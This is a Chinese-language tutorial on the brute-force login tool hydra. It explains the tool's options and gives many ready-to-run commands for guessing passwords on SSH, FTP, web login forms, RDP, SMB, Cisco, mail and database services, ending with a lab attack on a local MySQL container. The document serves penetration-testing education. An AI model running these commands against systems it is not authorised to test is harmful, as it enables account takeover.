需要用到的工具:
Kali (也可以不需要)
hydra (Kali自带,可以自行安装windows版或者其他平台)
密码字典 (自己去github找,关键词“字典”)
hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。 官
网:http://www.thc.org/thc-hydra。可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY,HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy,ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec,Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd firebird ncp afp等等。
OPT 可选项
hydra -l 用户名 -p 密码字典 -t 线程数 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程数 -o save.log -vV ip ssh
hydra ip ftp -l 用户名 -P 密码字典 -t 线程数(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
hydra -l 用户名 -p 密码字典 -t 线程数 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程数 -vV -e ns -f ip http-get /admin/index.php
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止,
10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中 的内容是表示错误猜解的返回信息提示。)
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
hydra -l administrator -P pass.txt 10.36.16.18 smb
hydra -l muts -P pass.txt my.pop3.mail pop3
hydra ip rdp -l administrator -P pass.txt -V
hydra -l admin -P pass.txt http-proxy://10.36.16.18
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
环境搭建过程:参考:MySQL5.7开启密码登录
密码字典:写入多个密码(一行一个),其中有一个必须是真实密码,否则爆破失败
爆破命令
hydra -l root -P pass.txt mysql://172.17.0.2
PS:
-l #指定一个用户名(-L 指定用户名字典)
-P #指定一个密码字典文件
然后可以看到,此时密码爆破成功了!
补充: 如果需要知道运行了多久,可以在命令的前面加上一个命令:time
time hydra -l root -P pass.txt mysql://172.17.0.2